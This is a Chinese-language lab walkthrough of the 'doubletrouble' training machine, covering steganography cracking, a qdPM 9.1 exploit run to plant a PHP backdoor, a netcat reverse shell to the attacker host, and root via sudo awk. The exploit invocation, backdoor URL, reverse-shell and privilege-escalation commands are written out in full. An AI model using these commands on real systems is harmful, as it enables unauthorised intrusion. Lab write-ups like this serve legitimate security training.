vulhub靶场 - doubletrouble(一)

admin 2023年4月20日02:30:18评论79 views字数 1763阅读5分52秒阅读模式
vulhub靶场 - doubletrouble(一)

01  主机探测

首先还是先进行主机探测

vulhub靶场 - doubletrouble(一)


发现192.168.56.3主机存活,详细探测一下端口,似乎没发现什么有用的内容

vulhub靶场 - doubletrouble(一)


访问一下80端口,发现是一个登录页面

vulhub靶场 - doubletrouble(一)


查看一下源代码,没发现什么线索

vulhub靶场 - doubletrouble(一)


注意到登录框上有个qdPM9.1,猜测是一个cms,在Google上进行相关搜索漏洞信息。

vulhub靶场 - doubletrouble(一)

vulhub靶场 - doubletrouble(一)


根据网上的一个文章发现存在一个反射型xss,但是跟我们获取flag相关性不是很高。相关文章:

https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting.html

vulhub靶场 - doubletrouble(一)

vulhub靶场 - doubletrouble(一)


没再发现其他有价值的信息。扫描一下目录

vulhub靶场 - doubletrouble(一)


未授权访问目录,目录下还是有很多东西的

vulhub靶场 - doubletrouble(一)

vulhub靶场 - doubletrouble(一)


翻了很久,发现一个邮箱的账号密码

# User:#   fabien:#     username: fabien#     password: changeme#     name:     Fabien Potencier#     email:    fabien.potencier@symfony-project.com#   kris:#     username: Kris.Wallsmith#     password: changeme#     name:     Kris Wallsmith#     email:    kris.wallsmith@symfony-project.com

vulhub靶场 - doubletrouble(一)

拿着找到的账号密码登录,发现报错“Error: No match for Email and/or Password”,登不上

vulhub靶场 - doubletrouble(一)


然后继续翻,找到一个数据库的账号密码文件,试了一下,也没登上去

vulhub靶场 - doubletrouble(一)

vulhub靶场 - doubletrouble(一)


翻了很久,还是没找到有用的东西,突然间想到刚刚的那个图片是在secret文件夹下,有点可疑,会不会是图片隐写?

vulhub靶场 - doubletrouble(一)


将图片下载下来,然后用strings命令查看,没发现有东西

vulhub靶场 - doubletrouble(一)

vulhub靶场 - doubletrouble(一)


binwalk命令查看文件里面是否还有其他的内容,没有发现

vulhub靶场 - doubletrouble(一)


用stegseek 爆一下图片密码

vulhub靶场 - doubletrouble(一)

注意:stegseek在kali中需要自己安装,在

https://github.com/RickdeJager/stegseek/releases

下载stegseek_0.6-1.deb,使用:sudo dpkg -i stegseek_0.6-1.deb进行安装,安装成功后使用字典进行爆破获得密码和文件名,命令:

stegseek --crack doubletrouble.jpg /usr/share/wordlists/rockyou.txt upfine.txt


发现用户名和密码:

otisrush@localhost.comotis666


登录后台,查看一下后台的功能

vulhub靶场 - doubletrouble(一)


发现一个能上传文件的地方,或许能上传后门木马

vulhub靶场 - doubletrouble(一)


先上传一个正常的照片上去,发现报错

vulhub靶场 - doubletrouble(一)

额,那再去刚刚的漏洞网站看看有没有可以利用的漏洞,这里利用第一个

vulhub靶场 - doubletrouble(一)


将第一个py文件下载下来,下载下来后使用以下命令进行执行

vulhub靶场 - doubletrouble(一)

python 50944.py -url http://192.168.56.3/ -p otis666 -u otisrush@localhost.com


成功返回链接

vulhub靶场 - doubletrouble(一)


访问一下,成功返回信息

http://192.168.56.3/uploads/users/864605-backdoor.php?cmd=whoami

vulhub靶场 - doubletrouble(一)


既然可以执行命令,那就尝试进行反弹shell

在浏览器中执行:nc -e /bin/bash 192.168.56.4 1234总命令:http://192.168.56.3/uploads/users/864605-backdoor.php?cmd=nc%20-e%20/bin/bash%20192.168.56.4%201234
kali上开启监听:nc -lvvp 1234

vulhub靶场 - doubletrouble(一)

vulhub靶场 - doubletrouble(一)


收到了反弹回来的shell,这是一个伪shell,我们先返回一个正常shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

vulhub靶场 - doubletrouble(一)


下一步就是提权。sudo -l 查看一波越权命令,显示存在一个awk命令

vulhub靶场 - doubletrouble(一)


查询下awk命令的提权方式进行提权,提权成功。命令:

sudo awk 'BEGIN {system("/bin/sh")}'

vulhub靶场 - doubletrouble(一)


进入/root目录,查看flag,但是发现一个ova文件,额,还有这种操作?

vulhub靶场 - doubletrouble(一)


在靶机上开启http服务,下载ova文件

vulhub靶场 - doubletrouble(一)

vulhub靶场 - doubletrouble(一)

欲知后事如何,且听我下回分说



原文始发于微信公众号(GSDK安全团队):vulhub靶场 - doubletrouble(一)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月20日02:30:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulhub靶场 - doubletrouble(一)https://cn-sec.com/archives/1681262.html

发表评论

匿名网友 填写信息